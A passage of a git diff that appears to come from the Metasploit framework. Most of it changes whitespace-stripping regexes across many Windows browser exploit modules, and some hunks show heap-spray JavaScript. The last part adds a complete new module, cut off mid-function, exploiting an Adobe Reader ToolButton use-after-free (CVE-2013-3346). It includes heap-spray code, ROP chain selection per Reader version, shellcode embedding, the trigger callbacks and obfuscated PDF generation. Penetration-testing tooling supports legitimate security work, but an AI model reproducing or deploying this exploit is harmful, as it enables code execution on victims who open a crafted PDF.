 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
index 655ef1c01b..b3f677f8cc 100644
--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -276,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
index 3dd6276e58..5670eedd15 100644
--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb
index e28b1164c9..5d37af6bee 100644
--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Sending #{self.name}")
 #Remove the extra tabs from content
- content = content.gsub(/^\t\t/, '')
+ content = content.gsub(/^ {4}/, '')
 # Transmit the response to the client
 send_response_html(cli, content)
diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb
index 4adf8e04eb..0a77eb0dbf 100644
--- a/modules/exploits/windows/browser/java_mixer_sequencer.rb
+++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb
@@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb
index 96b4da2fd2..8399836c1d 100644
--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -339,7 +339,7 @@ class Metasploit3 < Msf::Exploit::Remote
 HTML
 #Remove the extra tabs
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response_html(cli, html, { 'Content-Type' => 'text/html' })
diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb
index 85fe5fc09c..8c683e58c7 100644
--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
 obj.reduceRight(f,1,2,3);
 JS
- js = js.gsub(/^\t\t/, '')
+ js = js.gsub(/^ {4}/, '')
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
@@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote
 js.obfuscate
 end
- js = js.gsub(/^\t\t/, '')
+ js = js.gsub(/^ {4}/, '')
 html = <<-HTML
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending #{self.name}")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
index 0b28e93e2a..1b3cb2c0a7 100644
--- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
+++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t\t/, '')
+ html = html.gsub(/^ {6}/, '')
 print_status("Sending trigger loader")
 send_response_html(cli, html)
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending #{self.name}")
 send_response_html(cli, html)
diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb
index 9703762a92..8616601c5b 100644
--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb
index f9b87db448..61681e8f84 100644
--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb
index 7fb9beb1b4..fe074d86ee 100644
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -323,7 +323,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
index f1bfe4d198..787568d2dd 100644
--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html = html.gsub(/^\t\t\t/, '')
+ html = html.gsub(/^ {6}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
index 06870bad31..e4b2c478cb 100644
--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = get_exploit(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status "Sending HTML..."
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
index 54eaade4f4..8dc9aa65a7 100644
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -132,18 +132,18 @@ class Metasploit3 < Msf::Exploit::Remote
 # Land the payload at 0x0c0c0c0c
 # For IE 8
 js = %Q|
- var heap_obj = new heapLib.ie(0x20000);
- var code = unescape("#{js_code}");
- var nops = unescape("#{js_nops}");
- while (nops.length < 0x80000) nops += nops;
- var offset = nops.substring(0, #{my_target['Offset']});
- var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
- while (shellcode.length < 0x40000) shellcode += shellcode;
- var block = shellcode.substring(0, (0x80000-6)/2);
- heap_obj.gc();
- for (var i=1; i < 0x300; i++) {
- heap_obj.alloc(block);
- }
+var heap_obj = new heapLib.ie(0x20000);
+var code = unescape("#{js_code}");
+var nops = unescape("#{js_nops}");
+while (nops.length < 0x80000) nops += nops;
+var offset = nops.substring(0, #{my_target['Offset']});
+var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+while (shellcode.length < 0x40000) shellcode += shellcode;
+var block = shellcode.substring(0, (0x80000-6)/2);
+heap_obj.gc();
+for (var i=1; i < 0x300; i++) {
+ heap_obj.alloc(block);
+}
 |
 js = heaplib(js, {:noobfu => true})
@@ -398,7 +398,6 @@ function exploit(){
 if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
 html = html_info_leak
- html = html.gsub(/^\t\t/, '')
 print_status("Sending HTML to info leak...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 else
@@ -410,7 +409,6 @@ function exploit(){
 if leak == 0
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
 print_status("Sending HTML to trigger...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 return
@@ -433,7 +431,6 @@ function exploit(){
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
 print_status("Sending HTML to trigger...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
index 3dc110190f..df3b0b3db1 100644
--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html.gsub(/^\t\t/, '')
+ html.gsub(/^ {4}/, '')
 end
 def on_request_uri(cli, request)
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index a3e72cfba2..a821d4759c 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index 525d35a2e9..f5efd9b11a 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -269,7 +269,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index c81002c946..9b72d04c9f 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -351,7 +351,7 @@ class Metasploit3 < Msf::Exploit::Remote
 MYHTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index e89149310c..b7d998d5e8 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
 MYHTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
index 5f74c9936d..0da727daa7 100644
--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -396,7 +396,7 @@ class Metasploit3 < Msf::Exploit::Remote
 MYHTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index 222f1a8c9d..e047abf83d 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -122,7 +122,7 @@ function main(){
 }
 EOS
- js = js.gsub(/^\t\t/, '')
+ js = js.gsub(/^ {4}/, '')
 #JS obfuscation on demand
 if datastore['OBFUSCATE']
@@ -146,7 +146,7 @@ EOS
 EOS
 #Remove the extra tabs from content
- content = content.gsub(/^\t\t/, '')
+ content = content.gsub(/^ {4}/, '')
 print_status("Sending #{self.name}")
 send_response(cli, content, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index 3cea1eed63..8e173c5c33 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -258,7 +258,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
index 8d0f0d210b..e5b96fb70d 100644
--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
 # Remove extra tabs
- html = html.gsub(/^\t\t/, "")
+ html = html.gsub(/^ {4}/, "")
 print_status("Sending #{self.name}")
 send_response(cli, html, { 'Content-Type' => 'text/html' })
diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb
index 0c791ad2ba..de85d92d8b 100644
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
 #Clear the extra tabs
- content = content.gsub(/^\t\t/, '')
+ content = content.gsub(/^ {4}/, '')
 print_status("Sending #{self.name}")
 send_response(cli, content, {'Content-Type'=>'application/xml'})
diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
index 719345cacf..63cf7eca1c 100644
--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
index a4d80dd326..37f3aeeb95 100644
--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -490,7 +490,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
index f5d995cced..39741a0c92 100644
--- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
+++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- html.gsub(/^\t\t/, '')
+ html.gsub(/^ {4}/, '')
 end
 def on_request_uri(cli, request)
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index fae74d499f..4f9d7207c5 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -254,7 +254,7 @@ EOS print_status("Sending #{self.name}") #Remove the extra tabs from content - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index 4203774adc..a749d68d7e 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote var nops_padding = nops.substring(0, 0x73e-code.length-offset.length); var shellcode = code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length); JS_ROP - js_shellcode = js_shellcode.gsub(/^\t\t\t/, '') + js_shellcode = js_shellcode.gsub(/^ {6}/, '') end js = <<-JS @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index d04c5b861d..b148521ae9 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Remove extra tabs in HTML - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending #{self.name}") send_response( cli, html, {'Content-Type' => 'text/html'} ) 
diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 47a9522a3d..824118ffaa 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Remove extra tabs in HTML - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending malicious page") send_response( cli, html, {'Content-Type' => 'text/html'} ) diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 4b4acb6a71..3f5754b19c 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS # Remove extra tabs - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending #{self.name}") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index 4856058e0a..20cc15e315 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -268,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote this.pageNum = 2; JS - js = js.gsub(/^\t\t/,'') + js = js.gsub(/^ {4}/,'') if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) @@ -315,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote | - xml = xml.gsub(/^\t\t/, '') + xml = xml.gsub(/^ {4}/, '') return xml end diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb new file mode 100644 index 0000000000..ec62fc7114 --- /dev/null +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb 
@@ -0,0 +1,361 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::RopDb + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe Reader ToolButton Use After Free', + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in + November, 2013. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP / Adobe Reader 9/10/11', { }], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Aug 08 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + end + + def exploit + js_data = make_js + + # Create the pdf + pdf = make_pdf(js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + 
file_create(pdf) + end + + + def make_js + + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' })) + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(payload.encoded) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; + bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop9 = unescape("#{rop_9}"); +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { + obj_size = 0x330 + 0x1c; + rop = rop9; + ret_addr = unescape("%ua83e%u4a82"); + rop_addr = unescape("%u08e8%u0c0c"); + r_addr = 0x08e8; +} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + 
rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? 
+ pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do 
